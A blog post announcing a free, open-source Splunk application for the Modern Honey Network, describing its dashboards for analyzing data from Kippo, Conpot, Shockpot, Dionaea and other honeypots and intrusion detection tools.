MHN + Splunk: Announcing the Modern Honey Network Splunk Application

<p>During our presentation on "Lessons Learned from Building and Running MHN, the World's Largest Crowd-sourced Honeynet" at the <a href="http://www.securitybsides.com/w/page/90944586/BSidesSF2015" target="_blank">BSidesSF 2015</a> conference we released a free and open source (LGPL) Modern Honey Network application for Splunk. The application is available for download from Splunkbase <a href="https://splunkbase.splunk.com/app/2707/" target="_blank">here</a> and the code is available on Github <a href="https://github.com/threatstream/mhn-splunk" target="_blank">here</a>. Here is a link to a <a href="https://www.youtube.com/watch?v=Zd1Br8TW1mk">recording of the talk</a> and the <a href="http://www.slideshare.net/jasontrost/lessons-learned-from-building-and-running-mhn-the-worlds-largest-crowdsourced-honeynet" target="_blank">slides</a>. Modern Honey Network is a free and open source (LGPL) platform for deploying and managing honeypots and leveraging their data.</p><p><a href="https://www.youtube.com/watch?v=Zd1Br8TW1mk"><img border="1" src="https://cdn.filestackcontent.com/Ijyazh3Sdu7Hs1bC8AOw"/></a></p><p>The MHN Splunk app allows MHN users to deploy honeypots and then search, explore, analyze, and alert on events from honeypots using their Splunk instance. All page show the last 24 hours of data by default, but this can be changed by selecting a larger date range from time window drop down. Below are some screenshots of some of the dashboards this application includes.</p><p><b>Overview Dashboard</b>: this is the home screen of the MHN Splunk app. It shows a high level summary statistics about all of your honeypots including:</p><ul><li>Number of Attacks</li><li>Unique Attacker IPs</li><li>Unique MD5s collected</li><li>Unique URLs collected</li><li>Number of commands executed</li><li>Attacks per hour</li><li>Global Distribution of attack sources</li><li>And many more</li></ul><p><img border="1" src="https://cdn.filestackcontent.com/IjqyeNnZQPSW7XuPjAF2"/></p><p><b>Kippo Analytics:</b> this page shows all the relevant data collected by <a href="https://github.com/desaster/kippo" target="_blank">Kippo</a> honeypots. Kippo is an SSH honeypot that allows attackers to successfully "login" and gain a command shell on an emulated linux system. It allows defenders to capture the commands the attacker uses during their post compromise activities. This can be very useful for getting copies of their tools and locating their distribution sites for malware. This dashboard includes top usernames, passwords, username/password combos, and top commands executed.</p><p><img border="1" src="https://cdn.filestackcontent.com/jyd2S6hTTOmJ7g3ZeN10"/></p><p><b>p0f Analytics:</b> this page show all the data collected when performing passive OS fingerprinting using <a href="http://lcamtuf.coredump.cx/p0f3/" target="_blank">p0f</a>. This allows defenders to sometimes glean the operating system, connection type, application name, uptime, and other features about hosts that are actively probing or interacting with your honeypot systems.</p><p><img border="1" src="https://cdn.filestackcontent.com/aN3L5soT3SppOosgxEgx"/></p><p><b>Conpot Analytics:</b> this dashboard displays all the event data collected from <a href="http://conpot.org/" target="_blank">Conpot</a>, an industrial control systems (ICS) honeypot.</p><p><img border="1" src="https://cdn.filestackcontent.com/MTd7V222RxCgr10CCry5"/></p><p><b>Shockpot Analytics:</b> this dashboard displays all the event data collected from <a href="https://github.com/threatstream/shockpot" target="_blank">Shockpot</a>. Shockpot is a web application honeypot designed to mimic an application that is vulnerable <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" target="_blank">ShellShock vulnerability</a> and capture HTTP payloads used during exploitation.</p><p><img border="1" src="https://cdn.filestackcontent.com/irPY6TgYRd00awYiLdlz"/></p><p><b>Dionaea Analytics:</b> this dashboard displays all the event data collected from <a href="http://dionaea.carnivore.it/" target="_blank">Dionaea</a>. Dionaea is a very extensible honeypot that emulates many different services including: SMB, http, ftp, tftp, MSSQL, MySQL, SIP, and SDP. It excels at capturing payloads and malware, especially around Windows exploitation attempts.</p><p><img border="1" src="https://cdn.filestackcontent.com/gLlgv1yFQqONPoaARY1S"/></p><p><b>Snort/Suricata Analytics:</b> this dashboard displays all the event data collected from <a href="https://www.snort.org/" target="_blank">Snort</a> or <a href="http://suricata-ids.org/" target="_blank">Suricata</a>. Snort and Suricata are not honeypots, but they are incredibly useful when deployed alongside honeypots for providing added context around what specific vulnerabilities are being exploited.</p><p><img border="1" src="https://cdn.filestackcontent.com/erz2W1qRpiFuWCqRAxQ2"/></p><p>We will continue building out this Splunk application for the other honeypots supported by MHN (<a href="http://brindi.si/g/projects/wordpot.html" target="_blank">Wordpot</a>, <a href="https://github.com/jordan-wright/elastichoney" target="_blank">ElasticHoney</a>, <a href="http://glastopf.org/" target="_blank">Glastopf</a>, and <a href="http://amunhoney.sourceforge.net/" target="_blank">Amun</a>) and as new honeypots are added to the MHN platform. This project is open source (LGPL) and we encourage anyone interested to checkout the project out from <a href="https://github.com/threatstream/mhn-splunk" target="_blank">Github</a> and give us feedback on how to make it better (or pull requests with new features).</p><p>If this sort of work interests you, ThreatStream is <a href="https://www.anomali.com/company/careers">hiring both researchers and engineers</a> and if you want to be protected from threats like this, <a href="https://ui.threatstream.com/registration/">sign up to try ThreatStream Optic</a>. Lastly, if you are getting benefit from honeypots we would highly recommend <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;hosted_button_id=8WPALKEE9GMSC" target="_blank">donating</a> to the <a href="http://honeynet.org/" target="_blank">Honeynet Project</a>, an international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security.</p>